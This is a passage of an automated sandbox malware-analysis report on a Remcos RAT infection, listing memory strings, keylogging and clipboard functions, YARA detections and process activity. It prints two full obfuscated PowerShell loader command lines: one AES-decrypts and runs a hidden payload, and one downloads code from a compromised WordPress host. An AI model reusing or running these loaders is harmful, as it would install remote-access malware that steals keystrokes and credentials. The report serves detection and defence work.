                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                  Source: powershell.exe, 0000000A.00000002.3272627711.000000000453D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new.quranushaiqer.org.sa
                  Source: powershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm0
                  Source: powershell.exe, 0000000E.00000002.3272352105.00000000053D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfml
                  Source: powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-04-14-10-35/PreSignInSettingsConfig.json
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=4954a0
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                  Source: RegAsm.exe, RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhvCCC4.tmp.7.drString found in binary or memory: https://www.office.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownHTTPS traffic detected: 93.113.54.56:443 -> 192.168.2.5:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 34.166.62.190:443 -> 192.168.2.5:49720 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000004_2_0040A2B8
                  Installs a global keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,4_2_0040B70E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_004168C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,7_2_0040987A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_004098E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,8_2_00406DFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,8_2_00406E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,9_2_004068B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,9_2_004072B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,4_2_0040B70E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,4_2_0040A3E0

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5684, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041C9E2 SystemParametersInfoW,4_2_0041C9E2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: amsi32_7244.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_7632.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 5684, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7244, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Potential malicious VBS script found (suspicious strings)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped file: Call Terminologers183.ShellExecute("P" & Essens, forsaales, "", "", Swizzled221)Jump to dropped file
                  Very long command line found
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3116
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3859
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3859
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3116Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3859Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3859Jump to behavior
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: 